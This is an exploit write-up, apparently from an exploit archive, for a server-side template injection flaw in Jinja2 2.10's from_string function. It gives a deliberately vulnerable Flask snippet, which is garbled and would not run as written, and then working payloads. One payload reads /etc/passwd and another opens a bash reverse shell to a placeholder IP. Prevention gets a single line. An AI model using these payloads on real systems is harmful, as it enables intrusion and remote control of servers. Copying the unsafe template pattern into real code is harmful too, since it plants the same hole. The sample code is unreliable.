Jinja2 2.10 Command Injection

Jinja2 version 2.10 suffers from a command injection vulnerability.

MD5 | 11bfeb8f8d50d84b15935cf7f8b3274f

# Exploit Title: Jinja2 Command injection from_string function
# Date: [date]
# Exploit Author: JameelNabbo
# Website: Ordina.nl
# Vendor Homepage: http://jinja.pocoo.org
# Software Link: https://pypi.org/project/Jinja2/#files
# Version: 2.10
# Tested on: Kali Linux
# CVE-2019-8341

// from_string function is prone to SSTI where it takes the "source" parameter as a template object and render it and then return it.

//here's an example about the vulnerable code that uses from_string function in order to handle a variable in GET called 'username' and returns Hello {username}:

import Flask
import request
import Jinja2

def index():
username = request.values.get('username')
return Jinja2.from_string('Hello ' + username).render()

if __name__ == "__main__":
app.run(host='' , port=4444)

//Exploiting the username param
OUTPUT: Hello 16

Reading the /etc/passwd

http://localhost:4444/?username={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}

Getting a reverse shell
http://localhost:4444/?username={{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }}

How to prevent it:
Never let the user provide template content.

Related Posts